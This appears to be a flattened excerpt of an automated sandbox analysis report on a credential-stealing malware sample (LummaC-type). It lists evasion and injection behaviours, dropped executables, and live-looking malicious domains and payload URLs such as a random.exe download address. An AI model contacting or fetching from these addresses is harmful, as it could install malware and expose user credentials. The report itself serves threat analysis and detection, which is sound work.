195 Creates files in the system32 config directory 20->195 197 Contains functionality to start a terminal service 20->197 199 Injects code into the Windows Explorer (explorer.exe) 20->199 201 Tries to harvest and steal browser information (history, passwords, etc) 20->201 37 graph.exe 20->37         started        file6 signatures7 process8 dnsIp9 113 cheapptaxysu.click 104.21.67.146, 443, 49787, 49789 CLOUDFLARENETUS United States 22->113 151 Antivirus detection for dropped file 22->151 153 Multi AV Scanner detection for dropped file 22->153 155 Detected unpacking (changes PE section rights) 22->155 173 6 other signatures 22->173 87 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 26->87 dropped 89 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 26->89 dropped 41 cmd.exe 26->41         started        115 home.fivetk5ht.top 185.121.15.192 REDSERVICIOES Spain 29->115 117 httpbin.org 34.226.108.155 AMAZON-AESUS United States 29->117 157 Tries to detect sandboxes and other dynamic analysis tools (window names) 29->157 159 Machine Learning detection for dropped file 29->159 161 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->161 163 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 31->163 165 Tries to evade debugger and weak emulator (self modifying code) 31->165 167 Hides threads from debuggers 31->167 44 PING.EXE 33->44         started        47 conhost.exe 33->47         started        119 api.telegram.org 149.154.167.220, 443, 49853, 49861 TELEGRAMRU United Kingdom 39->119 121 drive.google.com 172.217.17.46, 443, 49824, 49827 GOOGLEUS United States 39->121 123 2 other IPs or domains 39->123 91 C:\Users\user\AppData\Local\...behaviorgraphxtuum.exe, PE32 39->91 dropped 93 C:\Program Files\...\graph.exe, PE32+ 39->93 dropped 169 Contains functionality to start a terminal service 39->169 171 LummaC encrypted strings found 39->171 49 Gxtuum.exe 39->49         started        51 graph.exe 39->51         started        file10 signatures11 process12 dnsIp13 175 Uses cmd line tools excessively to alter registry or file data 41->175 53 in.exe 41->53         started        57 7z.exe 41->57         started        59 conhost.exe 41->59         started        61 9 other processes 41->61 133 127.1.10.1 unknown unknown 44->133 177 Multi AV Scanner detection for dropped file 49->177 179 Contains functionality to start a terminal service 49->179 181 Machine Learning detection for dropped file 49->181 signatures14 process15 file16 83 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 53->83 dropped 145 Suspicious powershell command line found 53->145 147 Uses cmd line tools excessively to alter registry or file data 53->147 149 Uses schtasks.exe or at.exe to add and modify task schedules 53->149 63 powershell.exe 53->63         started        66 attrib.exe 53->66         started        68 attrib.exe 53->68         started        70 schtasks.exe 53->70         started        85 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 57->85 dropped signatures17 process18 signatures19 209 Uses ping.exe to check the status of other devices and networks 63->209 72 PING.EXE 63->72         started        75 conhost.exe 63->75         started        77 conhost.exe 66->77         started        79 conhost.exe 68->79         started        81 conhost.exe 70->81         started        process20 dnsIp21 125 127.0.0.1 unknown unknown 72->125
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.121.15.192
 home.fivetk5ht.top Spain
207046 REDSERVICIOES false
212.193.31.8
 unknown Russian Federation
57844 SPD-NETTR false
172.217.17.46
 drive.google.com United States
15169 GOOGLEUS false
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
34.226.108.155
 httpbin.org United States
14618 AMAZON-AESUS false
172.217.17.65
 drive.usercontent.google.com United States
15169 GOOGLEUS false
104.21.67.146
 cheapptaxysu.click United States
13335 CLOUDFLARENETUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
127.1.10.1
 unknown unknown
unknown unknown true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fivetk5ht.top 185.121.15.192 true
treehoneyi.click 172.67.180.113 true
cheapptaxysu.click 104.21.67.146 true
ipinfo.io 34.117.59.81 true
drive.google.com 172.217.17.46 true
drive.usercontent.google.com 172.217.17.65 true
api.telegram.org 149.154.167.220 true
httpbin.org 34.226.108.155 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
aspecteirs.lat false
    		high
    https://ipinfo.io/json false
      		high
      http://31.41.244.11/files/karl/random.exe false
        		high
        energyaffai.lat false
          		high
          http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 false
            		high
            grannyejh.lat false
              		high
              necklacebudi.lat false
                		high
                crosshuaht.lat false
                  		high
                  https://httpbin.org/ip false
                    		high